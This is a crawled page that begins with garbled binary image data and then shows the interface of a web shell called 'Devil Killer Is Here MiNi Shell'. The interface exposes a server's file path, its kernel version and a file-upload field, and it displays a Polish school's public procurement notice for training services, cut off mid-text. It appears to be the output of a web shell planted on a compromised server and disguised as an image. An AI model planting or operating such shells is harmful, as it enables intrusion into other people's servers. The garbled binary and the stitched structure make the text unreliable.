JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250908/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250908/0041224701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi szkoleniowe (7 części) w ramach projektu „W kierunku Europy” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Ekonomii i Usług</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000182159</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Astronautów 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">93-533</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kontakt@zseiu.elodz.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zsp2lodz.bip.wikom.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi szkoleniowe (7 części) w ramach projektu „W kierunku Europy” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-83c49db4-9fb2-4e84-bebb-72fb6e611720</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00412247</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00231324/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.20 Część 1 – Pilot wycieczek - szkolenie w projekcie W KIERUNKU EUROPY</p> <p class="mb-0">1.3.21 Część 2 - Pracownik biura podróży - szkolenie w projekcie W KIERUNKU EUROPY</p> <p class="mb-0">1.3.22 Część 3 - Rezydent Turystyczny dla nauczycieli - szkolenie w projekcie W KIERUNKU EUROPY</p> <p class="mb-0">1.3.23 Część 4 – Rezydent Turystyczny - szkolenia w pro9jekcie W KIERUNKU EUROPY</p> <p class="mb-0">1.3.24 Część 5 – Animator czasu wolnego - szkolenia w projekcie W KIERUNKU EUROPY</p> <p class="mb-0">1.3.25 Część 6 – Jak zostać stewardessą - szkolenie w projekcie W KIERUNKU EUROPY</p> <p class="mb-0">1.3.26 Część 7 – Prowadzenie biura podroży - szkolenie w projekcie W KIERUNKU EUROPY</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „W kierunku Europy” współfinansowany ze środków Europejskiego Funduszu Społecznego Plus w ramach programu Regionalne Fundusze Europejskie dla Łódzkiego na lata 2021 – 2027. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-83c49db4-9fb2-4e84-bebb-72fb6e611720 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">b)	Zamawiający informuje, iż przekazywanie oferty oraz dokumentów i oświadczeń składanych wraz z ofertą, odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl, <br/>Przekazywanie pozostałych dokumentów i oświadczeń może nastąpić w sposób określony powyżej w lit. b) lub za pośrednictwem e-mail: kontakt@zseiu.elodz.edu.pl<br/><br/><br/>strona postępowania:www.ezamowienia.gov.pl<br/>nr identyfikacyjny: ocds-148610-83c49db4-9fb2-4e84-bebb-72fb6e611720</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">f)	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy wynosi 150 MB,<br/>g)	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu 22 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w kafelku „Moje zgłoszenia w Centrum pomocy” – „Nowe zgłoszenie&#34; lub w kafelku &#34;FAQ&#34; - &#34;Nie znalazłem rozwiązania, chcę zgłosić problem&#34;. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: uzp.zamowienia@uzp.gov.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)	Administratorem danych osobowych jest Zespół Szkół Ekonomii i Usług<br/>im. Natalii Gąsiorowskiej, 93-533 Łódź, ul. Astronautów 19 mail: kontakt@zseiu.elodz.edu.pl reprezentowane przez Dyrektora<br/>W sprawach ochrony danych osobowych można się kontaktować z Inspektorem ochrony danych: e-mail kontakt@zseiu.elodz.edu.pl Dane dotyczące inspektora podane są na stronie internetowej: https://zsp2lodz.bip.wikom.pl/<br/>Przetwarzanie danych osobowych odbywa się w związku z pełnieniem przez Dyrektora obowiązków kierownika zamawiającego w postępowaniach o udzielenie zamówienia publicznego w związku z realizacją zadań powierzonych jednostce.<br/>2)	Przetwarzania danych osobowych odbywa się na podstawie przepisów prawa:<br/>1)	art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE w celu związanym z postępowaniem o udzielenie zamówienia publicznego;<br/>2)	ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), zwaną dalej PZP.<br/>3)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy PZP. <br/>4)	Zgodnie z art. 222 ust. 5 PZP dane wykonawców uczestniczących w postępowaniu przetargowym są udostępniane na stronie BIP ZIM, tak jak ogłoszenie o wykonaniu umowy na podstawie art. 448 PZP.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">5)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 PZP, a także podmioty upoważnione na podstawie i w granicach prawa oraz podmiotom, z którym Administrator Danych Osobowych zawarł umowę powierzenia przetwarzanie danych oraz odbiorcy danych w rozumieniu przepisów o ochronie danych osobowym, m.in. Urząd Miasta Łodzi, podmioty świadczące usługi pocztowe, kurierskie, usługi informatyczne.<br/>6)	Dane osobowe będą przechowywane w Integracyjnej Szkole Podstawowej nr 67 do czasu niezbędnego do realizacji zadań, o których mowa w pkt 3, a następnie przekazywane do archiwum zakładowego, prowadzącego obsługę jednostki i tam przechowywane odpowiednio: <br/>1)	dokumentacja z postępowania o udzielenie zamówień publicznych - zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas obowiązywania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy;<br/>2)	dokumentacja z postępowania o udzielenie zamówień publicznych na zadania realizowane z dofinasowaniem ze środków Unii Europejskiej - przez okres wymagany przez Instytucję Zarządzającą danym programem operacyjnym skąd pozyskano środki. <br/>7)	Każdy ma prawo do dostępu do swoich danych osobowych, ich poprawiania oraz prawo żądania ograniczenia przetwarzania. Prawo do przenoszenia danych oraz prawa wniesienia sprzeciwu wobec przetwarzania danych osobowych (tym samym prawo do usunięcia danych) z uwagi na konieczność wywiązywania się z obowiązków przewidzianych w PZP oraz dla celów ustalenia, dochodzenia lub obrony roszczeń oraz celów archiwalnych nie przysługuje. <br/>8)	Każdy ma prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie jego danych osobowych jest niezgodne <br/>z przepisami o ochronie danych osobowych. <br/>9)	Dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/WKE/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 – Pilot wycieczekPrzedmiotem zamówienia jest przeprowadzenie szkolenia„ Pilot wycieczek ” dla 20 uczniów ZSEiU w Łodzi w ramach projektu pn. „W kierunku Europy” współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus w ramach programu Regionalne Fundusze Europejskie dla Łódzkiego na lata 2021 – 2027. <br/>W ramach realizacji szkolenia „Pilot wycieczek” Wykonawca zobowiązany jest do:<br/> 1. Opracowania programu kursu, którego celem jest przygotowanie uczestników do wykonywania zadań pilota wycieczek turystycznych, w tym:<br/>- Ogólne zagadnienia dotyczące turystyki w Polsce i na świecie.<br/>- Wiedza o Polsce i świecie współczesnym.<br/>- Geografia turystyczna Polski i Europy.<br/>- Historia kultury i sztuki.<br/>- Przepisy prawne w turystyce i ubezpieczenia turystyczne<br/>- Obsługa ruchu turystycznego:<br/>•	rodzaje imprez turystycznych<br/>•	programowanie imprez turystycznych<br/>•	rozliczanie imprez turystycznych<br/>•	techniki obsługi grup (różnych grup docelowych m.in.: niepełnosprawni, narodowościowe, itp.).<br/>- Postępowanie pilota w sytuacjach awaryjnych i trudnych.<br/>- Pierwsza pomoc przedmedyczna.<br/>- Pilotaż wycieczek autokarowych i lotniczych.<br/>- Umiejętności psychofizyczne pilota wycieczek:<br/>•	emisja głosu<br/>•	komunikacja z grupą (werbalna i niewerbalna)<br/>•	techniki negocjacji<br/>•	zarządzanie czasem.<br/>- Zajęcia w terenie:<br/>•	umiejętność wykorzystywania mapy, GPS i innych źródeł informacji<br/>•	lotnisko<br/>•	hotel<br/>•	autokar<br/>•	miasto<br/>2. Przeprowadzenia szkolenia w wymiarze co najmniej 90 godzin dydaktycznych dla 2 grup uczestników po 10 osób w grupie. Zapewnienia dwóch trenerów realizujących szkolenie równolegle w terminie: od dnia podpisania umowy do 30.04.2027r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty (w każdej części odrębnie) zamawiający będzie się kierował następującymi kryteriami:<br/><br/>1)	C - cena	-	60%<br/><br/>Przy dokonywaniu oceny (w każdej części odrębnie) ofert Zamawiający będzie stosował następujące zasady: <br/>w kryterium cena zastosowany zostanie następujący wzór arytmetyczny:<br/>C = (X min ÷ X obliczana) x W max <br/>•	C – liczba punktów otrzymanych w danym kryterium<br/>•	W max – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium<br/>•	X min – najniższa wartość w danym kryterium spośród złożonych ofert w danej części<br/>•	X obliczana – wartość obliczanej oferty w danym kryterium.<br/><br/><br/>2)	D – doświadczenie wykładowcy - 40% (odrębnie dla każdej części)<br/><br/>W kryterium doświadczenie wykładowcy, który będzie prowadził szkolenie Zamawiający przyzna punkty za doświadczenie zawodowe wykładowcy w następujący sposób (odrębnie dla każdej części):<br/><br/><br/><br/>Wykonawca może otrzymać punkty wg niniejszego wzoru:<br/>D = (Do / Dmax) x 40<br/>gdzie:<br/>Dmax – największa ilość szkoleń z ww. tematu przeprowadzonych przez trenera spośród ofert złożonych w niniejszym postępowaniu<br/>Do – ilość szkoleń z zakresu ww. tematu wskazana w ofercie badanej.<br/>Maksymalnie można uzyskać 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - Pracownik biura podróży<br/><br/>Przedmiotem zamówienia jest przeprowadzenie szkolenia „ Pracownik biura podróży” dla 20 uczniów ZSEiU w Łodzi w ramach projektu pn. „W kierunku Europy” współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus w ramach programu Regionalne Fundusze Europejskie dla Łódzkiego na lata 2021 – 2027. <br/>W ramach realizacji szkolenia „Pracownik biura podróży” Wykonawca zobowiązany jest do:<br/><br/>1.	Opracowania programu szkolenia, którego celem edukacyjnym jest przekazanie uczestnikom wiedzy i ćwiczenie umiejętności niezbędnych do pracy na stanowisku prezentera i sprzedawcy oferty turystycznej w biurze podróży lub agencji turystycznej w tym:<br/>- Podstawy turystyki: Rodzaje imprez i usług turystycznych, regulacje prawne, współpraca z touroperatorami. <br/>- Obsługa klienta: Techniki sprzedaży, doradztwo w wyborze ofert, budowanie relacji z klientami. <br/>- Programowanie imprez turystycznych: Tworzenie ofert, kalkulacja kosztów, dobór ubezpieczeń. <br/>- Systemy rezerwacyjne: Obsługa popularnych systemów do rezerwacji imprez turystycznych<br/>- Zarządzanie biurem podróży: Podstawy funkcjonowania biura, obsługa reklamacji, budowanie relacji biznesowych<br/>2.	Przeprowadzenia szkolenia w wymiarze co najmniej 27 godzin ogółem w tym 20 godzin dydaktycznych i 7 godzin praktycznych ( obsługa programu do rezerwacji imprez turystycznych) dla 2 grup uczestników po 10 osób w grupie w następujących terminach: od dnia podpisania umowy do dnia 30.04.2027r.<br/>Harmonogram zajęć teoretycznych i praktycznych musi uwzględniać fakt, iż uczestnicy są osobami uczącymi się w systemie dziennym, zatem możliwe terminy to soboty.<br/>Po zakończeniu szkolenia Wykonawca zobowiązany jest przeprowadzić test praktyczny, potwierdzający uzyskanie przez uczestników określonych w programie szkolenia kompetencji oraz wystawić absolwentom zaświadczenie lub certyfikat potwierdzający udział w szkoleniu. <br/>3.	Przestrzegania przepisów o ochronie danych osobowych, zgodnie z ustawą z dnia 10 maja 2018 r o ochronie danych osobowych oraz Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>4.	Prowadzenia listy obecności uczestników na zajęciach i informowania Zamawiającego o nieobecnościach uczestnika kursu<br/>5.	Zapewnienia materiałów szkoleniowych takich jak: oprogramowanie, podręczniki, skrypty i inne potrzebne do przeprowadzenia szkolenia.<br/>6.	Wykonawca zobowiązany będzie po zakończeniu realizacji usługi do dostarczenia dokumentacji przebiegu szkolenia obejmującej: <br/>a) Program i harmonogram zajęć<br/>b)	Dziennik zajęć edukacyjnych obejmujących listę obecności, wymiar godzin i tematy zajęć edukacyjnych, <br/>c)	protokół z przeprowadzonego testu. <br/>d)	rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia.<br/>e)	Kopie zaświadczeń dla uczestników<br/>f)	Innych dokumentów w związanych z realizacja kursu<br/>Ponadto:<br/>1.	Dokumentacja dotycząca kursu powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo projektu.<br/>2.	Wykonawca zapewnia oprogramowanie do obsługi imprez turystycznych.<br/>3.	Zajęcia będą odbywać się w siedzibie Zamawiającego .<br/>4.	Zamawiający zapewni niezbędny sprzęt i narzędzia dydaktyczne ( laptopy, tablice interaktywne, rzutniki itp..) konieczne do realizacji szkolenia. Zapewni ponadto odpowiednie zaplecze dydaktyczne do realizacji zajęć praktycznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty (w każdej części odrębnie) zamawiający będzie się kierował następującymi kryteriami:<br/><br/>1)	C - cena	-	60%<br/><br/>Przy dokonywaniu oceny (w każdej części odrębnie) ofert Zamawiający będzie stosował następujące zasady: <br/>w kryterium cena zastosowany zostanie następujący wzór arytmetyczny:<br/>C = (X min ÷ X obliczana) x W max <br/>•	C – liczba punktów otrzymanych w danym kryterium<br/>•	W max – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium<br/>•	X min – najniższa wartość w danym kryterium spośród złożonych ofert w danej części<br/>•	X obliczana – wartość obliczanej oferty w danym kryterium.<br/><br/><br/>2)	D – doświadczenie wykładowcy - 40% (odrębnie dla każdej części)<br/><br/>W kryterium doświadczenie wykładowcy, który będzie prowadził szkolenie Zamawiający przyzna punkty za doświadczenie zawodowe wykładowcy w następujący sposób (odrębnie dla każdej części):<br/><br/><br/><br/>Wykonawca może otrzymać punkty wg niniejszego wzoru:<br/>D = (Do / Dmax) x 40<br/>gdzie:<br/>Dmax – największa ilość szkoleń z 